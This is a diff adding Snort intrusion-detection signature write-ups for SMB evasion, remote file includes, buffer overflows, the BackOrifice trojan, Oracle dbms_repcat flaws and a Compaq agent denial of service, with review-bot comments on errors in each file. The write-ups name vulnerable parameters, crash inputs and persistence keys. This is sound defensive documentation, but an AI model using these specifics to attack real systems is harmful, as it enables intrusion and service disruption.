+++ b/doc/signatures/2951.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2951
+
+--
+Summary:
+This event is generated when multiple stacked SMB requests are made.
+
+--
+Impact:
+Possible IDS evasion.
+
+--
+Detailed Information:
+This event is generated when multiple stacked SMB requests are detected.
+This behavior does not occur on a regular basis in normal network
+traffic. This event may indicate an attempt to evade an IDS.
+
+--
+Affected Systems:
+	All systems using SMB.
+
+--
+Attack Scenarios:
+An attacker might create multiple stacked SMB requests in an attempt to
+bypass an IDS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If the second and third stacked requests are of a combined length that
+is less than 37 bytes this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disallow the use of SMB.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
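Review bot: Corrective Action does not match the event. Impact and Detailed Information describe a possible IDS evasion technique, not a vulnerability, so "Apply the appropriate vendor supplied patches" has nothing to patch, and "Disallow the use of SMB." is not a realistic response when Affected Systems is "All systems using SMB". The actionable step is to examine the stacked requests and the traffic that follows them for the attack they may be hiding. The False Negatives note about the 37-byte threshold is specific and useful; keep it.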
--- /dev/null
+++ b/doc/signatures/100000672.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000672
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "users.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "users.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
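Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host...") and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials") describe a credential-validation weakness, not the remote file include in the "header_prog" parameter of "users.php" that the Summary and first paragraph describe; replace them with the RFI scenario (a URL to an attacker-controlled file supplied in "header_prog", which the script then includes and executes). Also "ona web server" should be "on a web server", Affected Systems ("All systems running CGI applications using Harpia") should name the Harpia versions affected or say "all versions" if that is intended, and the file ends with an extra blank line after the final "--".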
--- /dev/null
+++ b/doc/signatures/305.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 305
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in ElectroTechnical Laboratories Delegate proxy server.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host with the privileges of the root user.
+
+--
+Detailed Information:
+Numerous buffer overflow conditions exist in ElectroTechnical Laboratories Delegate proxy server. It is possible for a remote attacker to gain a root shell on the victim host.
+
+Affected Systems:
+	ETL Delegate 5.9.x
+	ETL Delegate 6.0.x
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unkown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0165
+
+Bugtraq:
+http://www.securityfocus.com/bid/808
+
+--
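Review bot: the "--" separator between Detailed Information and "Affected Systems:" is missing, so the two sections run together; add it. Attack Scenarios ("Exploit scripts are available") repeats Ease of Attack instead of describing an attack and should say what the attacker sends to the proxy (a request that overflows one of the buffers named in Detailed Information). Typos: "compromize" should be "compromise" and "unkown" should be "unknown". "Sid: 305" on a single line also differs from the two-line "Sid:" / "305" layout used in the other files.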
--- /dev/null
+++ b/doc/signatures/2161.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2161
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
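Review bot: "An virus" should be "A virus" and "propogate" should be "propagate" in Impact. Detailed Information says the rule matches "a filename extension commonly used by viruses" without saying which extension(s) this sid checks; naming them would make the False Positives entry ("A legitimate attachment to an email may generate this event") concrete, since a reader can then judge how often that attachment type is legitimate on their network.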
--- /dev/null
+++ b/doc/signatures/390.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+390
+
+--
+
+Summary:
+This event is generated when an ICMP Alternate Host Address datagram is detected on the network.  This ICMP Type is not documented in an RFC, but may be implemented by routing equipment to direct hosts to the correct IP address or neighboring hosts.
+
+--
+
+Impact:
+This ICMP Type is not implemented in most standard operating systems and is a potential indication of information gathering activities.
+
+--
+
+Detailed Information:
+ICMP Type 6 (Alternate Host Address)  is not defined in an RFC and should not be considered legitimate network traffic.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the network.
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Alternate Host Address datagrams.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 6 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
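Review bot: the file omits the "Affected Systems:" section that every other signature file has (Detailed Information goes straight to Attack Scenarios); add it. "wirter" in Contributors should be "writer". The Summary says the type "may be implemented by routing equipment to direct hosts to the correct IP address", while Detailed Information says it "should not be considered legitimate network traffic"; reconcile the two (for example, "no common operating system or router implements it") so the Corrective Action to block Type 6 at the firewall does not contradict the Summary.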
--- /dev/null
+++ b/doc/signatures/2379.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
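Review bot: the Affected Systems list gives "FW-1 1.4.1" and "VPN-1 1.4.1 SP5a", but the Check Point product line in question is 4.1 (4.1 SP5a and NG FP0/FP1); please confirm and correct the version strings, since they are what an analyst will grep against an asset inventory. Additional References is empty; the ISAKMP Certificate Request overflow described here is CVE-2004-0040 and should be cited. "usually root" only holds for Unix installations; on Windows the service runs as SYSTEM, so say "root or SYSTEM".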
--- /dev/null
+++ b/doc/signatures/1479.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1479
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
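Review bot: this description never names the CGI script or URI the rule matches, so it cannot be used for triage; the Summary, Detailed Information and Affected Systems are generic boilerplate about credential validation that describes no specific vulnerability, and Additional References is empty. State which script (the rule's uricontent) triggers sid 1479 and cite the advisory for it. Also fix "running ona web server" (on a).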
--- /dev/null
+++ b/doc/signatures/116.txt
@@ -0,0 +1,104 @@
+Rule:
+Backdoor.BackOrifice
+
+--
+Sid:
+112, 116
+
+--
+Summary:
+Backdoor.BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535
+Protocol: UDP although in later versions TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+Event messages relating to activity from this Trojan are:
+
+	SID	Message
+	---	-------
+	112	BackOrifice access (outgoing TCP connection)
+	116	BackOrifice access (incoming UDP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS399
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
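Review bot: "it is unlikely that the attacker's client IP address has been spoofed" is only safe to say for the TCP case (sid 112); sid 116 fires on an incoming UDP datagram, and a UDP source address can be forged by an attacker who does not need the reply, so qualify the sentence before an analyst uses the source IP as attribution. Fix the typos "BackOrifice sever" (server), "direcory" (directory), "viewing inthe" (in the), and indent the three registry keys consistently (only the first is tab-indented).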
--- /dev/null
+++ b/doc/signatures/3355.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3355
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
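Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") contradicts the Detailed Information, which describes a malformed DCOM request to an RPC port; reconcile the two, since an SMB share request and a DCOM RPC activation request are different traffic and different detection. Additional References is empty for a Microsoft RPC DCOM rule; cite the Microsoft security bulletin and CVE the rule targets. Fix "Expoit code exists" (Exploit).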
--- /dev/null
+++ b/doc/signatures/1816.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1816
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
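Review bot: as with 1479.txt, nothing here identifies the PHP script or parameter the rule matches, and the credential-validation boilerplate describes no concrete vulnerability; name the script sid 1816 triggers on, cite its advisory in the empty Additional References section, and fix "running ona web server" (on a).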
--- /dev/null
+++ b/doc/signatures/1018.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1018
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to attempt brute force changes or to discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or attempt brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+
+--
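Review bot: Corrective Action should add removing the .htr ISAPI script mapping from the web server's application mappings, since the iisadmpwd files are .HTR and unmapping .htr disables them (and every other .htr handler) in one step, which is what the IIS Lockdown reference achieves. Fix "whether a specific account name exist" (exists) and remove the stray blank line after "Affected Systems:" so the file matches the layout of the other signature documents.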
--- /dev/null
+++ b/doc/signatures/100000339.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000339
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "V-Webmail" application running on a webserver. Access to the file "core.php" using a remote file being passed as the "CONFIG[pear_dir]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONFIG[pear_dir]" parameter in the "core.php" script used by the "V-Webmail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using V-Webmail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
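Review bot: the third Detailed Information paragraph and the Attack Scenarios section are credential-validation boilerplate that contradicts the remote file include described in the Summary; the scenario for this rule is an attacker supplying a URL of their choosing as the "CONFIG[pear_dir]" parameter to "core.php" so that the PHP interpreter includes and executes remote code. Rewrite those two passages accordingly, change "All systems running CGI applications using V-Webmail" to "All systems running V-Webmail", fix "running ona web server" (on a) and "an exploitation attempt has been attempted", and drop the two leading blank lines.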
--- /dev/null
+++ b/doc/signatures/2850.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2850
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_mview_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
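Review bot: "Ease of Attack: Simple." omits the prerequisite that the attacker already holds a database session with execute privilege on dbms_repcat; state it, because it changes the triage priority of this event considerably. Corrective Action should add revoking EXECUTE on dbms_repcat from users that do not administer replication, alongside the vendor patch. Formatting: the line break between "create_mview_repobject" and ". This procedure" splits the sentence, and "Oracle Oracle9i" duplicates the vendor name.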
--- /dev/null
+++ b/doc/signatures/1647.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1647
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
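Review bot: same problem as 1479.txt; the text does not identify the CGI script sid 1647 matches, so an analyst cannot verify the hit, the "validating the credentials of a client host" text describes no specific flaw, Additional References is empty, and "running ona web server" needs fixing (on a).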
--- /dev/null
+++ b/doc/signatures/2730.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2730
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
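Review bot: as in 2850.txt, Ease of Attack should state that exploitation requires an authenticated database session with execute privilege on dbms_repcat, and Corrective Action should mention revoking EXECUTE on dbms_repcat from users who do not need replication. The stray line break before ". This procedure" and the duplicated vendor name in "Oracle Oracle9i" should also be fixed.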
--- /dev/null
+++ b/doc/signatures/2706.txt
@@ -0,0 +1,78 @@
+Rule: 
+
+--
+Sid: 
+2706
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+This rule does not generate an event, however, Sid 2707 depends
+on this rule to function properly.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
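Review bot: the file refers to three different SIDs and contradicts itself: the Summary says this rule (2706) does not generate an event and exists for sid 2707, the Detailed Information says "sid 2705 may generate false positive events" and "it is disabled by default", and the False Positives section says false positives "are known to occur with this rule". Decide which SID each sentence is about and which rule is disabled. The vulnerability is the GDI+ JPEG COM-marker overflow from MS04-028 (CVE-2004-0200); cite it in the empty Additional References section. Fix "have the use attempt to view" (user) and the trailing comma after "(DoS),".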
--- /dev/null
+++ b/doc/signatures/2394.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2394
+
+--
+Summary:
+This event is generated when a malformed request is sent to the Compaq Web-Based Management Agent.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Compaq Web-Based Management Agent is used to perform remote system administration for Windows hosts.  A vulnerability exists in the software when traffic is sent t
+o access to Compaq Web-Based Management Agent that contains a malformed request, possibly causing the service to crash.  URL requests that contain the characters "
+<!>" or "<!" followed by arguments followed by ">" cause the denial of service to occur.  Note that the rule uses an initial keyword of "content" instead of "urico
+ntent" since uricontent only examines web server ports identified in the pre-processor http_inspect in the configuration setup.  Default configurations do not incl
+ude port 2301 as a web server port, preventing the event from being generated.
+
+--
+Affected Systems:
+Host running Compaq Web-Based Management Agent.
+
+--
+Attack Scenarios:
+An attacker can send a malformed request to the listening service, causing the system to crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound port 2301 traffic or restrict access to known authorized IP addresses.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8014
+
+--
